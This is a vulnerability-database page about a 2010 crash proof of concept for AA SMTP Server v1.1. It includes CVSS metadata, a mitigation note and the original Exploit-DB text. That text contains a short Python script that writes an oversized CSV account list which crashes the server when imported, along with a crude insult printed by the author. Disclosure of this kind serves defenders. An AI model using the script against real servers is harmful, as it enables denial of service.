AA SMTP SERVER v.1.1 -- Crash POC

vendor:

AA SMTP Server

by:

SONiC

7,5

CVSS

HIGH

Crash

119

CWE

Product Name: AA SMTP Server

Affected Version From: v.1.1

Affected Version To: v.1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:aa2soft:aa_smtp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

AA SMTP SERVER v.1.1 — Crash POC

AA SMTP Server is a light-weighted SMTP server software to run SMTP service for you. An attacker can create a malicious CSV file with a large number of characters and import it into the server, causing the server to crash.

Mitigation:

Ensure that the server is configured to only accept CSV files of a certain size and that the server is regularly updated with the latest security patches.

Source

Exploit-DB raw data:

=========================
AA SMTP SERVER v.1.1 -- Crash POC
=========================

Application : AA SMTP SERVER v.1.1
Vendor URL : http://www.aa2soft.com/download.htm
Category : Windows/POC/Crash
#######################################################################################################


Author :             ..::[ SONiC ]::.. aka ~the_M4LW4r3~ <sonicdefence[at]gmail.com>

Special thanks to : *Ashwin Vamshi*,*Sid3^effects*,*r0073r (inj3ct0r.com)*,*L0rd CruSad3r*,M4n0j,*MA1201[Team iNfection]*,D3aDF0x,Nishi,Bunny,CURS3D,SeeME 
                      and All INDIAN Frnds & iNj3ct0r Crew

Greetz to :           iNj3cT0r.com, www.andhrahackers.com

#######################################################################################################


Description : 
AA SMTP Server is a light-weighted SMTP server software to run SMTP service for you. You can send mails to recipients directly or indirectly (via ISP relay sending) at high speed. AA SMTP Server supports can also work smoothly together with your existing mail server.

###############################################################################################################

Exploit:

#!usr/bin/python

print("To all guys  who showing attitude ---poda thevidiya paiya")
exp = open("c:\\init.csv","a")
junk = "A"*9999999
pre = '''"qwertyuiop'''
after = '''@me.com", 	"qwertyuiop", 	""
"1",'''
exp.write(pre+junk+after)
exp.close()
print ("import this accountlist.csv from your Server")

###############################################################################################################

# ..::[ SONiC ]::.. aka the_M4LW4R3


# Inj3ct0r.com [2010-08-12]